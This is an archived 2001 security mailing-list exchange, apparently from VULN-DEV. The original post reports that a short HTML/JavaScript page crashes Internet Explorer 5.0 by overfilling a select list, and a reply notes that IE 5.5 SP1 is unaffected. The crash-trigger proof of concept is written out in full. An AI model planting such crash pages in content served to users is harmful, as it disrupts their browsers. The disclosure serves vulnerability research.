Seems IE 5.5 SP1 (v5.5.4522.1800) on WinNT4 Sp5 is not susceptible... Regards, Tim. -----Original Message----- From: Thomas Magnum [mailto:dr_oo_pyat_private] Sent: Wednesday, 23 May 2001 1:44 To: VULN-DEVat_private Subject: I: IE 5.0 vulnerability I found out a vulnerability for IE 5.0, don't know if it was already discovered (if so, forget this). It seems that the problem is javascript. I don't know if it is exploitable, but if I try to open an html file like this: <script> function crashme() { var i, opt; for(i = 0; i < 7; i++) { opt = new Option('crashing...', i); document.vulnForm.p_select.options[i] = opt; document.vulnForm.p_select.options[i].selected = true; } } </script> <html> <head> <title>IE 5.0 Vulnerability</title> </head> <body> <form name="vulnForm"> <table width="100%" border="0"> <tr> <td align="center"> <select name="p_select" size="5" multiple> <option>__________________</option> </select> </td> </tr> <tr> <td align="center"> <input type="button" name="cmd" value="go!" onClick="crashme()"> </td> </tr> </table> </form> </body> </html> I get the classical Winxx error... I noticed that IE crashes when I try to put in the select at least 3 items more than its size. ================================================================== De informatie opgenomen in dit bericht kan vertrouwelijk zijn en is uitsluitend bestemd voor de geadresseerde. Indien u dit bericht onterecht ontvangt wordt u verzocht de inhoud niet te gebruiken en de afzender direct te informeren door het bericht te retourneren. ================================================================== The information contained in this message may be confidential and is intended to be exclusively for the addressee. Should you receive this message unintentionally, please do not use the contents herein and notify the sender immediately by return e-mail. ==================================================================
This archive was generated by hypermail 2b30 : Tue May 22 2001 - 21:47:33 PDT